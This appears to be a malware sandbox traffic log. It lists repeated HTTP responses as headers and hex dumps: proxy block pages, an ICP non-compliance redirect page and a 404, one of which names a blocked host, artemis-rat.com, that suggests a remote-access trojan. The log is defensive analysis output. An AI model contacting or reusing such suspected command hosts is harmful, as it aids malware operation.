Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:35 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:35 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:36 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:36 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:36 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 